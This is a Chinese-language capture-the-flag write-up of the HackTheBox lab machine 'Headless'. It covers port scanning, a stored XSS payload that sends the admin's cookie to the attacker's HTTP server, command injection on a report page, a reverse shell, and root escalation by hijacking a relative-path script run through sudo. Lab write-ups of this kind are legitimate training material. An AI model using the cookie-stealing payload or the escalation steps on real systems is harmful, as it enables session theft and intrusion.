过了好长时间因为研究了别的东西所以一直忘了更新这里 话不多说 开始更新
今天 更新靶机 HTB-Headless
OSCP-系列靶机 Headless
这个靶机算是简单的那种
攻击机:10.10.14.32
靶机:10.10.11.8
还是先做信息收集
nmap -n -v -sS -p- 10.10.11.8 --max-retries=0 -oN scan.txt -Pn
开放端口如下:
访问5000端口看下
填写下信息
比较值得关注的就是is_admin burp启动!
测试了一番下来 发现 这个参数对xss的参数比较敏感
翻译一下:
Your IP address has been flagged, a report with your browser information has been sent to the administrators for investigation.
大概意思就是我的浏览器信息被发送给管理员了呗
那就搞个反弹管理员Cookie的xss呗
我的payload
先在终端开个web
我用的python3
python3 -m http.server 99
<script>new Image().src="http://10.10.14.32:99/?cookie="+ document.cookie;</script>
然后就回弹回来了
burp解码一下头部 user的就是普通的呗 然后admin的就是管理员的呗
扫一下目录就扫出来一个 没懂试啥的东西
用管理员访问一下 就是这样的
就在这个参数上研究研究 试了几下 命令注入有效
既然能执行命令 那直接 执行就行
这个就是普通用户的flag
然后 写个脚本 反弹shell
获取shell 以后 想办法提权
先 sudo -l看下
去看看这个文件是个啥
类似系统监控的东西 检查是不是root 然后 看了看系统状态 硬盘这些
重点是 他要去检查一个 数据库服务是否启动 如果没有 他就执行 initdb.sh 去启动这个数据库
这个东西他没写死是绝对路径 好像有机可乘
提权成功
sudo -l
cat /usr/bin/syscheck
echo "/bin/bash" > initdb.sh
chmod +x initdb.sh
sudo /usr/bin/syscheck
whoami
最终就是在root目录下root的flag
完结撒花
总结
首先扫描端口 发现 22 和 5000
访问5000端口 发现xss 根据提示 知道头部信息回传管理员页面
xss回弹管理员Cookie
通过管理员Cookie 访问扫描出来的401页面
在生成报告页面有命令执行 get到普通用户的权限
然后反弹shell sudo -l 发现可以提权的点
最终提权get root flag